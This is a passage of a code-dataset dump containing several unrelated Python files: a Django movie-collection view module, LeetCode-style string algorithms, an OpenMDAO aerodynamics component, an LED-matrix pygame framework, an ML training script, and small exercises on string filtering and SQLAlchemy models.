here.\n\nAPI_URL = \"http://www.omdbapi.com/?\"\n\n#Mixins\n# http://brack3t.com/our-custom-mixins.html\nclass CheckPermMixin(object):\n permission_required = None\n login_url = settings.LOGIN_URL\n def dispatch(self, request, *args, **kwargs):\n has_permission = request.user.has_perm(self.permission_required)\n if not has_permission:\n messages.error(request, \"You don't have access to this app!\")\n return HttpResponseRedirect('%s?next=%s' % (self.login_url, self.request.path))\n return super(CheckPermMixin, self).dispatch(request, *args, **kwargs)\n\nclass IndexView(CheckPermMixin, ListView):\n template_name = 'movies/index.html'\n model = Movie\n # Required fields for CheckPermMixin\n permission_required = 'movies.view_movie'\n def get_queryset(self):\n # .order_by('?') is really expensive in large dbs, need fix\n return UserMovie.objects.filter(user=self.request.user).order_by('?')[:3]\n def get_context_data(self, **kwargs):\n context = super(IndexView, self).get_context_data(**kwargs)\n context.update({'movies': UserMovie.objects.filter(user=self.request.user).count()})\n context.update({'unseen': UserMovie.objects.filter(user=self.request.user, seen=False).count()})\n return context\n\nclass MovieDetailView(DetailView):\n model = UserMovie\n def get_object(self):\n return get_object_or_404(UserMovie, user=self.request.user, movie=Movie.objects.get(slug=self.kwargs.get('movie')))\n def 
get_context_data(self, **kwargs):\n        context = super(MovieDetailView, self).get_context_data(**kwargs)\n        return context\n\nclass BrowseView(CheckPermMixin, ListView):\n    template_name = 'movies/movies_browse.html'\n    model = UserMovie\n    permission_required = 'movies.view_movie'\n    context_object_name = 'movie_list'\n    paginate_by = 10\n    def get_queryset(self):\n        return UserMovie.objects.filter(user=self.request.user)\n\n@permission_required('movies.add_movie')\ndef add_imdb(request, id):\n    api_request = requests.get(API_URL + \"i=%s&plot=full&r=json\" % (id))\n    if (api_request.status_code == requests.codes.ok):\n        data = json.loads(api_request.text)\n        if data.get('Response') == 'False':\n            messages.error(request, 'No movie with the ID: %s found in the OMDb API' % (id))\n            return HttpResponseRedirect(reverse('movies:index'))\n        else:\n            if Movie.objects.filter(title=data.get('Title', 'Unknown')).count():\n                movie = Movie.objects.get(title=data.get('Title', 'Unknown'))\n            else:\n                movie = Movie(\n                    title=data.get('Title', 'Unknown'),\n                    year=data.get('Year', 'N/A'),\n                    plot=data.get('Plot', 'N/A'),\n                    rating=data.get('imdbRating', 'N/A'),\n                    runtime=data.get('Runtime', 'N/A'),\n                    poster_url=data.get('Poster', ''),\n                    imdb=id\n                )\n                movie.save()\n            if not UserMovie.objects.filter(movie=movie, user=request.user).count():\n                user_movie = UserMovie(\n                    movie = movie,\n                    user = request.user\n                )\n                user_movie.save()\n                messages.success(request, '%s added to the collection' % movie.title)\n            else:\n                messages.error(request, 'You already have this movie in your collection')\n            return HttpResponseRedirect(reverse('movies:movie_detail', args=(movie.slug,)))\n    messages.error(request, 'Could not add movie, try again!') \n    return HttpResponseRedirect(reverse('movies:index'))\n\nclass EditMovie(CheckPermMixin, UpdateView):\n    model = UserMovie\n    template_name_suffix = '_update_form'\n    fields = ['last_seen',]\n    permission_required = 'movies.change_movie'\n    def get_object(self):\n        return get_object_or_404(UserMovie, id=self.kwargs.get('id'))\n    def form_valid(self, form):\n        if self.get_object().user.id == self.request.user.id:\n            self.object = form.save()\n            messages.success(self.request, '%s updated' % self.object.movie.title)\n        else:\n            messages.error(self.request, 'This is not your movie to edit')\n        return HttpResponseRedirect(reverse('movies:movie_detail', args=(self.object.movie.slug,)))\n\nclass DeleteMovie(CheckPermMixin, DeleteView):\n    model = UserMovie\n    permission_required = 'movies.delete_movie'\n    success_url = reverse_lazy('movies:index') \n    def get_object(self):\n        return get_object_or_404(UserMovie, id=self.kwargs.get('id'))\n    # Check possibility to move the delete function to the model and remove UserMovie objects from there\n    def delete(self, request, *args, **kwargs):\n        self.object = self.get_object()\n        if self.object.user.id == request.user.id:\n            movie = self.object.movie.title\n            if UserMovie.objects.filter(movie=self.object.movie).count() == 1:\n                Movie.objects.get(slug=self.object.movie.slug).delete()\n                # Automatically removes UserMovie-object\n            else:\n                UserMovie.objects.get(id=self.object.id).delete() \n            messages.success(request, '%s successfully removed from collection' % movie)\n        else:\n            messages.error(request, 'This is not your movie to delete')\n        return HttpResponseRedirect(self.get_success_url())\n\ndef search_imdb(request):\n    context = {}\n    query = request.GET.get('q', None)\n    if query:\n        context.update({'query': query})\n        api_request = requests.get(API_URL + 's=%s&r=json' % (query))\n        if (api_request.status_code 
== requests.codes.ok):\n            data = json.loads(api_request.text)\n            if data.get('Response') == 'False':\n                messages.error(request, 'No search result from OMDb API')\n                return HttpResponseRedirect(reverse('movies:index'))\n            else:\n                context.update({'movies': data.get('Search')})\n    return render(request, 'movies/movie_search_imdb.html', context)\n\ndef search(request):\n    context = {}\n    query = request.GET.get('q', None)\n    if query:\n        context.update({'query': query})\n        if len(query) > 3:\n            context.update({'results': UserMovie.objects.filter(movie__title__icontains=query, user=request.user)})\n        else:\n            messages.error(request, 'The search query must be larger than 3 characters.')\n    return render(request, 'movies/movie_search.html', context)\n","repo_name":"hakloev/old-hakloevno","sub_path":"apps/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797337766","text":"#!/usr/bin/env python3\n\nimport sys\n\n\nclass Solution:\n    def strStr(self, haystack: str, needle: str) -> int:\n        needle_size = len(needle)\n        haystack_size = len(haystack)\n        if (needle_size > haystack_size):\n            return -1\n        prime = 11\n        hash_s = 0\n        hash_t = 0\n        left = 0\n        right = needle_size - 1\n        #so let's implement hash_s and hash_t (hash haystack and hash needle)\n        for i in range(needle_size):\n            hash_s += (ord(haystack[i]) * (prime ** i))\n            hash_t += (ord(needle[i]) * (prime ** i))\n        while right < haystack_size:\n            #if hashes are equal we compare the sliding window from left to right with needle\n            if (hash_s == hash_t):\n                if (haystack[left : right + 1] == needle):\n                    return (left)\n            #we update the hash\n            #we subtract the value of the left char of the sliding window\n            hash_s -= ord(haystack[left])\n            #we divide the hash by prime\n            hash_s //= prime\n            #and if we are not at the end, we add the value of the right + 1 char of the sliding window * (prime **(needle_size - 1))\n            if (right + 1 < haystack_size):\n                hash_s += (ord(haystack[right + 1]) *(prime ** (needle_size - 1)))\n            right += 1\n            left += 1\n        return (-1)\n\nsol = Solution()\nprint(sol.strStr(sys.argv[1], sys.argv[2]))","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/find_the_index_of_the_first_occurence_in_a_string/main_rabbin_karp.py","file_name":"main_rabbin_karp.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9345421740","text":"import numpy as np\n\nimport openmdao.api as om\n\n\nclass CD0Comp(om.ExplicitComponent):\n    \"\"\" Computes the zero-lift drag coefficient\n    \"\"\"\n    def initialize(self):\n        self.options.declare('num_nodes', types=int)\n\n    def setup(self):\n        nn = self.options['num_nodes']\n\n        # Inputs\n        self.add_input('mach', shape=(nn,), desc='Mach number', units=None)\n\n        # Outputs\n        self.add_output(name='CD0', val=np.zeros(nn), desc='zero-lift drag coefficient', units=None)\n\n        # Jacobian\n        ar = np.arange(nn)\n        self.declare_partials(of='CD0', wrt='mach', rows=ar, cols=ar)\n\n    def compute(self, inputs, outputs):\n        M = inputs['mach']\n\n        idx_low = np.where(M < 1.15)[0]\n        idx_high = np.where(M >= 1.15)[0]\n\n        outputs['CD0'][idx_low] = 0.013 + 0.0144 * (1.0 + np.tanh((M[idx_low] - 0.98) / 0.06))\n        outputs['CD0'][idx_high] = 0.013 + \\\n            0.0144 * (1.0 + np.tanh(0.17 / 0.06)) - 0.011 * (M[idx_high] - 1.15)\n\n    def compute_partials(self, inputs, partials):\n        M = inputs['mach']\n\n        idx_low = np.where(M < 1.15)[0]\n        idx_high = 
np.where(M >= 1.15)[0]\n\n        k = 50.0 / 3.0\n\n        partials['CD0', 'mach'][idx_low] = 0.24 / (np.cosh(k * (M[idx_low] - 0.98))**2)\n        partials['CD0', 'mach'][idx_high] = -0.011\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/min_time_climb/aero/cd0_comp.py","file_name":"cd0_comp.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"20479807910","text":"from configparser import ConfigParser\nimport os\nimport sys\nimport pygame\nimport pygame.locals as pgl\nfrom PIL import Image\ntry:\n    from .custom_virtual_gamepads import set_up_gamepad\nexcept (ImportError, SystemError) as e:#if doing screen test\n    from custom_virtual_gamepads import set_up_gamepad\nimport signal\n\n\nCURRDIR = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(os.path.join(CURRDIR, 'matrix','bindings','python'))\nfrom rgbmatrix import RGBMatrix, RGBMatrixOptions\n\n\ndef init_pygame_display(width, height):\n    os.putenv('SDL_VIDEODRIVER', 'fbcon')\n    os.environ[\"SDL_VIDEODRIVER\"] = \"dummy\"\n    pygame.init()\n    #pygame.display.set_mode((width, height), 0, 24)\n    #return pygame.display.get_surface()\n    return pygame.Surface((width, height))\n\n\ndef process_input_arg(argv):\n    \"\"\"\n    Returns a tuple of len 2.\n    The first element is the path to a config file.\n    The second element is an integer for the demo. If set to 0, then the \n    pygame surface will be sent to the matrix leds. Else, it will be output\n    on the normal screen with a scaling factor.\n    \"\"\"\n    assert (len(argv)<4),\"maximum 2 arguments\"\n    assert (len(argv)>1),\"needs at least one argument to the config file\"\n    \n    demo = 0\n    configfile = ''\n    for arg in argv:\n        if \"--demo\" in arg:\n            demo = arg.split('=')\n            if len(demo) == 1:\n                demo = 1\n            elif len(demo) == 2:\n                demo = int(demo[1])\n        else: \n            configfile = arg\n    assert (os.path.isfile(configfile)), configfile+\" should be a path to the config file\"\n    return configfile, demo\n    \n\n\ndef get_config(configfile):\n    \"\"\"\n    configfile: path to a .ini file with the murapix configuration\n    \n    returns mapping, width, height, max_number_of_panels, led_rows, led_cols, parallel\n    \"\"\"\n    config = ConfigParser()\n    config.read(configfile)\n    mapping = config.get('matrix','mapping')\n    #first get number of holes\n    number_of_holes = mapping.count('.')\n    #then change mapping to a list of list\n    mapping = mapping.split('\\n')\n    mapping = [m.split(',') for m in mapping]\n    #check if mapping is correctly configured\n    good_size_col = all(len(mapping[m]) == len(mapping[m+1]) \n                        for m in range(len(mapping)-1))\n    assert good_size_col, \"There should be the same number of panels per row\"\n    number_of_rows = len(mapping)\n    number_of_cols = len(mapping[0])\n    max_number_of_panels = number_of_cols * number_of_rows - number_of_holes\n    panel_numbering = list(range(1,max_number_of_panels+1))\n    for i in range(number_of_rows):\n        for j in range(number_of_cols):\n            if '.' 
in mapping[i][j]:\n                mapping[i][j] = None\n            else:\n                try:\n                    p_n = int(mapping[i][j])\n                except: \n                    err_mess = 'mapping must contain either \".\" or integers'\n                    raise ValueError(err_mess)\n                err_mess = \"Integers in mapping should form a sequence from 1 to \"+str(max_number_of_panels)\n                assert (p_n in panel_numbering), err_mess\n                mapping[i][j] = p_n\n                panel_numbering.remove(p_n)\n    err_mess = \"Missing integers in mapping: \"+str(panel_numbering)\n    assert (len(panel_numbering)<1), err_mess\n    \n    led_rows = config.getint('matrix','led-rows')\n    led_cols = config.getint('matrix','led-cols')\n    assert (led_rows==led_cols), \"For now, murapix can only control square led panels\"\n    #TODO: check if non-square panels work\n    width = number_of_cols * led_cols\n    height = number_of_rows * led_rows\n    \n    if config.has_option('matrix','parallel'):\n        parallel = config.getint('matrix','parallel')\n        err_msg = (\"Each channel must have the same number of panels:\\n\"\n                   \"{} total number of panels for {} channels\".format(max_number_of_panels, \n                                                                       parallel))\n        assert max_number_of_panels%parallel == 0, err_msg\n    else:\n        parallel = 1\n    \n    return mapping, width, height, max_number_of_panels, led_rows, led_cols, parallel\n    \n    \ndef get_largest_rect(mapping, key='surface'):\n    \"\"\"\n    get the largest rectangle from the mapping of LED matrices.\n    \n    \"Largest\" may be calculated by two methods:\n    \"surface\": the rectangle with the largest surface\n    \"diag\": the rectangle with the largest diagonal\n    \"\"\"\n    \n    #https://stackoverflow.com/questions/19414673/in-numpy-how-to-efficiently-list-all-fixed-size-submatrices \n    from numpy.lib.stride_tricks import as_strided\n    from itertools import product \n    import numpy as np\n    m = np.array(mapping)\n    l = product(range(m.shape[0],0,-1),range(m.shape[1],0,-1))\n    if key=='surface':\n        all_shapes = sorted(l, key=lambda row: row[0]*row[1],reverse=True)\n    elif key=='diag':\n        all_shapes = sorted(l, key=lambda row: row[0]**2+row[1]**2,reverse=True)\n    else:\n        raise ValueError('Key must be \"surface\" or \"diag\". {} was entered'.format(key))\n    \n    for sub_shape in all_shapes:\n        view_shape = tuple(np.subtract(m.shape, sub_shape) + 1) + sub_shape\n        arr_view = as_strided(m, view_shape, m.strides * 2)\n        arr_view = arr_view.reshape((-1,) + sub_shape)\n        for i in arr_view:\n            if i.all():\n                return i\n    \ndef get_largest_rect_add(led_rows, m,n=None,key='surface'):\n    \"\"\"\n    Returns the pixel/led address of the largest rectangle using pygame standard:\n    ((left, top), (width, height))\n    \n    \n    ____\n    usage\n    ____\n    \n    If get_largest_rect was not called before, just insert the mapping. You\n    may indicate the calculation method\n    >>> (left, top), (width, height) = get_largest_rect_add(led_rows,mapping)\n    >>> (left, top), (width, height) = get_largest_rect_add(led_rows,mapping,key='diag')\n    In case the largest rectangle is already known, insert both\n    >>> (left, top), (width, height) = get_largest_rect_add(led_rows,mapping,rec)\n    \n    \"\"\"\n    import numpy as np\n    if n is None:\n        n = get_largest_rect(m,key=key)\n    if type(m) is not np.ndarray:\n        m = np.array(m)\n    \n    top, left = (np.argwhere(m==n[0][0])*led_rows).flatten().tolist()\n    _t, _l = ((1+np.argwhere(m==n[-1][-1]))*led_rows).flatten().tolist()\n    width, height = _l-left, _t-top\n    \n    \n    return ((left, top),(width, height))\n    \ndef get_deadzone_addresses(mapping, led_rows):\n    \"\"\"\n    Yields a list of ((left, top), (width, height)) for each square where\n    there is a dead zone in the mapping, i.e. 
no LED in the matrix.\n    \"\"\"\n    for i, n in enumerate(mapping):#x, rows\n        for j, m in enumerate(n):#y, panel number\n            if m is not None:\n                continue\n            #rectangle to extract from the width*height scratch surface\n            yield ((led_rows*j,led_rows*i),(led_rows,led_rows))\n\n\ndef get_panel_adresses(mapping, led_rows):\n    \"\"\"\n    Yields a list of ((left, top), (width, height)) for each square where\n    there is a panel in the mapping.\n    \"\"\"\n    for i, n in enumerate(mapping):#x, rows\n        for j, m in enumerate(n):#y, panel number\n            if m is None:\n                continue\n            #rectangle to extract from the width*height scratch surface\n            yield ((led_rows*j,led_rows*i),(led_rows,led_rows))\n\n\n\nclass Murapix:\n    \"\"\"\n    Create a subclass to use Murapix\n    \n    The screen surface on which you need to blit the sprites is self.scratch.\n    \n    Murapix has the following properties:\n    self.mapping: how the different LED panels are put in place\n    self.demo: 0 if going to the LED panels, a positive int if it is going to the standard screen\n    self.width: the total width of the rectangle enclosing all panels in pixels\n    self.height: the total height of the rectangle enclosing all panels in pixels\n    self.max_number_of_panels: the number of panels\n    self.led_rows: the number of pixels for both height and width of the panels\n    self.scratch: the total pygame surface which is going to be processed by the murapix draw methods to either go to the LED panels or, in demo mode, to the standard screen.\n    self.gamepad: None by default. If set to a path string pointing to an SVG, will start the virtual gamepad\n    \"\"\"\n    def __init__(self):\n        configfile, demo = process_input_arg(sys.argv)\n        (mapping, width, height, max_number_of_panels, \n         led_rows, led_cols, parallel) = get_config(configfile)\n        self.RUNNING = True\n        self.mapping = mapping\n        self.demo = demo\n        self.width = width\n        self.height = height\n        self.max_number_of_panels = max_number_of_panels\n        self.led_rows = led_rows\n        self.led_cols = led_cols\n        self.parallel = parallel\n        self.scratch = pygame.Surface((width, height))\n        self.gamepad = None\n        \n        \n        #signal handlers to quit gracefully\n        signal.signal(signal.SIGINT, self.quit_gracefully)\n        signal.signal(signal.SIGTERM,self.quit_gracefully)\n        print(\"\"\" murapix Copyright (C) 2019 hy@amani.eu\n    This program comes with ABSOLUTELY NO WARRANTY.\n    This is free software, and you are welcome to redistribute it\n    under certain conditions.\"\"\")#LICENSE\n        \n        if not demo:\n            #must be a raspberry pi configured for murapix, hence nodename\n            #must be \"rpi-murapix\"\n            if os.uname().nodename not in (\"rpi-murapix\",\"raspberrypi\"):\n                raise EnvironmentError(\"Not a murapix, please select demo mode with --demo=X\")\n            \n            print('Going on the Murapix!')\n            print('{0} channel(s) of [{1}*{2}={3} LED] X [{4} LED]'.format(parallel,\n                             max_number_of_panels//parallel,\n                             led_rows,\n                             max_number_of_panels*led_rows//parallel,\n                             led_cols))\n            #the screen is just a single line of panels\n            \n            options = RGBMatrixOptions()\n            options.rows = options.cols = led_rows\n            options.parallel = parallel\n            options.chain_length = max_number_of_panels//parallel\n            options.hardware_mapping = 'regular'\n            options.drop_privileges = 0\n            self.matrix = RGBMatrix(options = options)\n            \n            self.double_buffer = self.matrix.CreateFrameCanvas()\n            self._screen = init_pygame_display((max_number_of_panels//parallel)*led_rows, \n                                               led_cols*parallel)\n        else: \n            print('Going on the standard screen...') \n            pygame.init()\n            self._screen = pygame.display.set_mode((width*demo,height*demo),0, 32)\n        \n        \n        self.clock = 
pygame.time.Clock()\n self.fps = 15 \n \n \n def setup(self):\n pass\n\n def logic_loop(self):\n pass\n \n def graphics_loop(self):\n pass\n \n def run(self):\n if self.gamepad:\n try:\n self.start_gamepad()\n except Exception as e:\n print(\"Error starting gamepad\") \n print(e) \n self.close()\n raise e\n self.setup()\n \n if self.demo:\n draw = self.draw_demo\n else:\n draw = self.draw_murapix\n while self.RUNNING:\n self.logic_loop()\n self.graphics_loop()\n draw()\n self.clock.tick(self.fps)\n \n self.close()\n \n def draw_demo(self):\n demo = self.demo\n width = self.width\n height = self.height\n pygame.transform.scale(self.scratch,\n (width*demo,height*demo),\n self._screen)\n pygame.display.flip()\n \n def draw_murapix(self):\n scratch = self.scratch\n screen = self._screen\n mapping = self.mapping\n led_rows = self.led_rows\n led_cols = self.led_cols\n parallel = self.parallel\n curr_chain_row = 0\n NoP_per_chain = int(self.max_number_of_panels/parallel)\n \n #now blit each simulated panel in a row onto screen in the order \n #indicated by the mapping in the config file. \n #TODO: may be more efficient by vectorizing & using blits() instead of blit()\n for i, n in enumerate(mapping):#x, rows\n for j, m in enumerate(n):#y, panel number\n if m is None:\n continue\n #find in which chain \"m\" is\n curr_chain_row = int((m-1)/NoP_per_chain)\n \n #print into a square that fits hzeller doc led addressing\n #see https://github.com/hzeller/rpi-rgb-led-matrix/blob/master/wiring.md#chains \n screen.blit(scratch,#surface to take from\n #LED (row,col) on the lined up panels\n (led_rows*((m-(NoP_per_chain*curr_chain_row))-1),\n curr_chain_row*led_cols),\n #rectangle to extract from the width*height scratch surface\n area=pygame.Rect((led_rows*j,led_rows*i),\n (led_rows,led_rows)))\n \n \n \n py_im = pygame.image.tostring(screen, \"RGB\",False)\n pil_im = Image.frombytes(\"RGB\",screen.get_size(),py_im)\n self.double_buffer.SetImage(pil_im)\n self.matrix.SwapOnVSync(self.double_buffer)\n \n def start_gamepad(self):\n assert os.path.isfile(self.gamepad), \"self.gamepad must be a path to an SVG file\"\n self.p = set_up_gamepad(self.gamepad)\n self.draw_select_gamepads()\n pygame.joystick.quit()\n pygame.joystick.init()\n \n \n def draw_select_gamepads(self):\n rect_area = get_largest_rect_add(self.led_rows,self.mapping)\n ((left, top),(width, height)) = rect_area\n not_selected = True\n no_gamepad = True\n active_joystick = False\n fontsize = 3*width//18-1\n top = top + (height-fontsize*4)//2\n font = pygame.font.Font(None, fontsize)\n text = font.render(\"Players connected:\",\n False,\n (255,255,255),\n (0,0,0))\n text_end0 = font.render(\"Press any key\",\n False,\n (255,255,255),\n (0,0,0))\n text_end1 = font.render(\" to start\",\n False,\n (255,255,255),\n (0,0,0))\n \n if self.demo:\n draw = self.draw_demo\n else:\n draw = self.draw_murapix\n \n while not_selected:\n self.clock.tick(self.fps)\n NoJS = [x.startswith('js') for x in os.listdir(\"/dev/input\")].count(True)\n \n text_NoP = font.render(str(NoJS),\n False,\n (255,255,255),\n (0,0,0))\n if NoJS>0 and no_gamepad:\n no_gamepad = False\n pygame.joystick.quit()\n pygame.joystick.init()\n active_joystick = pygame.joystick.Joystick(0)\n active_joystick.init()\n \n \n for event in pygame.event.get():\n if (active_joystick and event.type == pgl.JOYBUTTONDOWN):\n not_selected = False\n print('{} players selected'.format(NoJS))\n \n \n tw , th = font.size(\"Players connected:\")\n self.scratch.blit(text,(left+(width-tw)//2,top))\n 
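# the connected-player count and the start prompt are drawn below the header\n            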
self.scratch.blit(text_NoP,(left+width//2,top+1*fontsize))\n            tw , th = font.size(\"Press any key\")\n            self.scratch.blit(text_end0,(left+(width-tw)//2,top+2*fontsize))\n            tw , th = font.size(\" to start\")\n            self.scratch.blit(text_end1,(left+(width-tw)//2,top+3*fontsize))\n            draw()\n    \n    def close(self):\n        #https://stackoverflow.com/questions/2638909/killing-a-subprocess-including-its-children-from-python\n        \n        if self.gamepad:\n            try:\n                os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)\n            except Exception as e:\n                print(\"Error trying to kill gamepad node and its children\")\n                print(e)\n        \n        \n        pygame.quit()\n        sys.exit()\n\n    def quit_gracefully(self,sig,frame):\n        print('\\n### {} was caught, terminating ###'.format(signal.Signals(sig).name))\n        self.RUNNING = False\n        self.close()\n","repo_name":"murapixrepo/murapix","sub_path":"murapix.py","file_name":"murapix.py","file_ext":"py","file_size_in_byte":17150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74332999846","text":"import os, sys, time, json\nimport utils\nfrom utils import recorder\n\nfrom data import HSIDataLoader \nfrom new_data import create_data_loader\nfrom trainer import get_trainer, BaseTrainer, CrossTransformerTrainer\nimport evaluation\n\n\ndef train_by_param(param):\n    # 0. reset the recorder to avoid polluting results\n    recorder.reset()\n    # 1. generate data\n    dataloader = HSIDataLoader(param)\n    train_loader, test_loader = dataloader.generate_torch_dataset() \n    # train_loader, test_loader, all_data_loader, _ = create_data_loader() \n\n    # 2. train and test\n    trainer = get_trainer(param)\n    trainer.train(train_loader, test_loader)\n    eval_res = trainer.final_eval(test_loader)\n\n    # 3. record all information\n    recorder.record_param(param)\n    recorder.record_eval(eval_res)\n    \n    return eval_res\n\n\n# include_path = {\n#     'conv2d.json',\n#     'vit_30.json',\n#     }\n\ninclude_path = {\n    # 'conv3d.json',\n    # 'conv2d.json',\n    # 'conv1d.json',\n    # 'vit_30.json',\n    'cross_param.json'\n}\n\ndef run_all():\n    save_path_prefix = './res/'\n    if not os.path.exists(save_path_prefix):\n        os.makedirs(save_path_prefix)\n\n    for name in include_path:\n        path_param = './params/%s' % name\n        with open(path_param, 'r') as fin:\n            param = json.loads(fin.read())\n        print('start to train %s...' % name)\n        eval_res = train_by_param(param)\n        print('model eval done of %s...' % name)\n        path = '%s/%s' % (save_path_prefix, name) \n        recorder.to_file(path)\n\n    \n\ndef run_diffusion():\n    path_param = './params/cross_param.json'\n    with open(path_param, 'r') as fin:\n        param = json.loads(fin.read())\n    path_prefix = './res/patch_8_pca_2000'\n    if not os.path.exists(path_prefix):\n        os.makedirs(path_prefix)\n\n    for t in [5,10,100,200,500]:\n        for index in [0,1,2]:\n            name = \"t%s_%s_full.pkl.npy\" % (t, index)\n            print('start to train %s...' % name)\n            param['diffusion_data_sign'] = name\n            eval_res = train_by_param(param)\n            print('model eval done of %s...' 
% name)\n            path = '%s/indian_diffusion_%s' % (path_prefix, name) \n            recorder.to_file(path)\n\n\n\n\nif __name__ == \"__main__\":\n    # run_diffusion()\n    run_all()\n    \n    \n\n\n\n\n","repo_name":"chenning0115/hypercodes_for_diffusion","sub_path":"codes/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24108816973","text":"import re\nimport sys\n\n\"\"\" below: the transformations implemented with built-in string functions \"\"\"\n\nurl_start = ('www.', 'http://', 'https://')\nurl_ends = ('.ru', '.com', '.рф', '.org', '.net')\n\n\ndef is_it_url (s):\n    \"\"\" check whether the string starts with one of url_start and ends with one of url_ends \"\"\"\n    for something in url_start:\n        if s.startswith(something):\n            for anything in url_ends:\n                if s.endswith(anything):\n                    return True\n            #else:\n                #return False\n\n    \n\ndef is_it_email (s):\n    \"\"\" check whether the string contains an @ sign and ends with a domain from url_ends \"\"\"\n    if s.find('@') != -1:\n        for something in url_ends:\n            if s.endswith(something):\n                return True\n            #else:\n                #return False\n\n\ndef is_it_threedigits (s):\n    if len(s)>3 and s.isdigit():\n        return True\n    else: return False\n\n\ns = input('Введите строку ')\ntry: \n    new_string = ''\n    \n    strings = s.split(' ')\n    for string in strings:\n        replace = ''\n        if is_it_url(string):\n            replace = '[ссылка запрещена]'\n        elif is_it_email(string):\n            replace = '[контакты запрещены]'\n        elif is_it_threedigits(string):\n            continue\n        if len(replace) > 0:\n            new_string += replace + ' '\n        else:\n            new_string += string + ' ' \n\n    \"\"\" below: the same transformations done with regular expressions \"\"\"\n    \n    new_string_regular = re.sub(r'\\w',s[0], s[0]) + re.sub(r'\\w', lambda get_low: get_low.group(0).lower(), s[1:]) #as I understand it, the first character may be in either case here\n    new_string_regular = re.sub(r'\\b(?:(?:http[s]?|ftp):\\/\\/|www\\.)[-a-z0-9|:.?&+=]*(?:(\\.ru|\\.com|\\.рф|\\.org|\\.net))', '[Ссылка запрещена]' , new_string_regular)\n    new_string_regular = re.sub(r'[-a-z0-9|.]*@*[-a-z0-9|:.]*(?:(\\.ru|\\.com|\\.рф|\\.org|\\.net))', '[Контакты запрещены]', new_string_regular)\n    new_string_regular = re.sub(r'\\s\\d\\d\\d\\d+' , '' , new_string_regular)\n\n    \"\"\" Print the results of the built-in and the regex transformations \"\"\"\n    \n    print('Преобразования встроенными функциями... ')\n    print(new_string[1] + new_string[2:].lower()) \n    print('Преобразование с помощью регулярный выражений... ')\n    print(new_string_regular)\n    \nexcept IndexError:\n    print('Строка пуста... 
')\nexcept Exception:\n    print(\"Unexpected error:\", sys.exc_info()[0])\n\n\n","repo_name":"Tanya-atatakai/Python_Homeworks","sub_path":"3_2_change_strings/3_2_change_strings.py","file_name":"3_2_change_strings.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34702529245","text":"from sqlalchemy import *\nfrom SQLA_Base import Base\nfrom sqlalchemy.orm import relationship\n\nclass Facility_Types(Base):\n    # defines the different facility types\n    __tablename__ = 'facility_types'\n    id = Column(Integer, primary_key=True)\n    Fac_Type = Column(String(), unique=True)\n    facility_chars = relationship(\"Facility_Chars\") #setup 1:many relationship between the table noted in this line and this class\n    facility_type_has_nel = relationship(\"Facility_Type_Has_NEL\") #setup 1:many relationship between the table noted in this line and this class\n\n    def __repr__(self):\n        return \"<Facility_Types(id=%s, Fac_Type=%s)>\" % (\n            self.id, self.Fac_Type)\n","repo_name":"mallen69/C-Users-micha-Desktop-DevLeague-Begins-Nov-7-2017-Project_Sprint_7","sub_path":"Sprint03_Data_Operation/_jonhonda_dat/special_prj/SQLA_DB_facility_types.py","file_name":"SQLA_DB_facility_types.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28398909735","text":"class Solution(object):\n    def fullJustify(self, words, maxWidth):\n        \"\"\"\n        :type words: List[str]\n        :type maxWidth: int\n        :rtype: List[str]\n        \"\"\"\n        res = []\n        res_list = []\n        curr = []\n        count, pos = 0, 0\n        while pos < len(words):\n            word = words[pos]\n            if len(word) > maxWidth:\n                pos += 1\n            if len(word) + count + len(curr)<= maxWidth:\n                count += len(word)\n                curr.append(word)\n                pos += 1\n            else:\n                res_list.append(curr)\n                curr = []\n                count = 0\n        if len(curr) > 0:\n            res_list.append(curr)\n        # print res_list\n        for index, curr in enumerate(res_list):\n            text = ''\n            remain = sum([len(t) for t in curr])\n            if len(curr) == 1:\n                # single word\n                text = curr[0] + ' ' * (maxWidth - remain)\n            elif index == len(res_list) - 1:\n                # last line\n                text = ' '.join(curr)\n                text += ' ' * (maxWidth - remain - len(curr) + 1)\n            else:\n                # multiple\n                step = (maxWidth - remain) // (len(curr) - 1 )\n                extra = (maxWidth - remain) % (len(curr) - 1 )\n                for index in range(len(curr) - 1):\n                    text += curr[index] + ' ' * step\n                    if extra > 0:\n                        # assign from left\n                        text += ' '\n                        extra -= 1\n                text += curr[-1]\n            res.append(text)\n        return res","repo_name":"yangliunk1987/LearningLeetcode","sub_path":"068.Text_Justification/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14615793586","text":"class DictShop(dict):\n    def __init__(self, *args, **kwargs):\n        if len(args) == 0:\n            self.shop_dict = {}\n        elif type(args[0]) is dict:\n            for i in args[0]:\n                self.__check_key(i)\n            super().__init__(args[0])\n        else:\n            raise TypeError('аргумент должен быть словарем')\n\n    def __setitem__(self, key, value):\n        self.__check_key(key)\n        self.shop_dict[key] = value.d\n\n    @staticmethod\n    def __check_key(key):\n        if not isinstance(key, Thing):\n            raise TypeError('ключами могут быть только объекты класса Thing')\n\n\nclass Thing:\n    def __init__(self, name, price, weight):\n        self.name = name\n        self.price = price\n        self.weight = weight\n        self.d = {'name': self.name, 'price': self.price, 'weight': self.weight}\n\n\nth_1 = Thing('Лыжи', 11000, 
